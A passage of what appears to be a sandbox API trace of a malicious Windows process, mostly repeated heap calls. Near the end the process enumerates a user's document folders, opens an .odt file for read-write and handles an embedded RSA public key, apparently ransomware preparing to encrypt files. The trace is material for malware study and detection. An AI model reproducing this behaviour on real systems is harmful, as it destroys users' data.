RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0196.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0196.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0196.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0196.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0196.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0196.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0196.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.760] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\TawX51muD\\") returned="TawX51muD\\" [0196.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0196.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0196.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.761] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\") returned="ivoTJ\\" [0196.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0196.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0196.761] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\") returned="PeBfuwtoR 4\\" [0196.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0196.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0196.761] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\") returned="AzlD\\" [0196.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cf68 [0196.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0196.762] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0196.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0196.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cf68 | out: hHeap=0x6a0000) returned 1 [0196.762] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0196.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0196.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0196.763] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0196.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0196.763] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0196.763] PathFindFileNameW (pszPath="") returned="" [0196.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.763] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\TawX51muD\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\tawx51mud\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x274d38a0, ftCreationTime.dwHighDateTime=0x1d89cdc, ftLastAccessTime.dwLowDateTime=0xfff20b90, ftLastAccessTime.dwHighDateTime=0x1d8a1cd, ftLastWriteTime.dwLowDateTime=0xfff20b90, ftLastWriteTime.dwHighDateTime=0x1d8a1cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa90 [0196.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.764] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x274d38a0, ftCreationTime.dwHighDateTime=0x1d89cdc, ftLastAccessTime.dwLowDateTime=0xfff20b90, ftLastAccessTime.dwHighDateTime=0x1d8a1cd, ftLastWriteTime.dwLowDateTime=0xfff20b90, ftLastWriteTime.dwHighDateTime=0x1d8a1cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.764] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1ac3b0, ftCreationTime.dwHighDateTime=0x1d8981d, ftLastAccessTime.dwLowDateTime=0xd11fb050, ftLastAccessTime.dwHighDateTime=0x1d8a1bf, ftLastWriteTime.dwLowDateTime=0xd11fb050, ftLastWriteTime.dwHighDateTime=0x1d8a1bf, nFileSizeHigh=0x0, nFileSizeLow=0x24da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aiG5nj9ZiLn1Ciu Lcka.odt", cAlternateFileName="AIG5NJ~1.ODT")) returned 1 [0196.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0196.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.764] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\TawX51muD\\aiG5nj9ZiLn1Ciu Lcka.odt") returned=".odt" [0196.765] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\TawX51muD\\aiG5nj9ZiLn1Ciu Lcka.odt" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\tawx51mud\\aig5nj9ziln1ciu lcka.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0196.765] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=9434) returned 1 [0196.765] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0196.768] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x24b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.768] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0196.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0196.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0196.770] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.770] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x24da, lpOverlapped=0x0) returned 1 [0196.771] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0196.771] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.771] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.771] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eab40) returned 1 [0196.772] CryptCreateHash (in: hProv=0x6eab40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0196.773] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.773] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0196.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0196.773] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0196.773] GetLastError () returned 0x0 [0196.773] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0196.773] CryptReleaseContext (hProv=0x6eab40, dwFlags=0x0) returned 1 [0196.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0196.773] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0196.773] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0196.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.773] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0196.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0196.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0196.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24e0) returned 0x2d4b778 [0196.774] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0196.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0196.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0196.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cf68 [0196.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2a0 [0196.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cfb0 [0196.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2b8 [0196.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2e8 [0196.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a348 [0196.774] RtlAllocateHeap 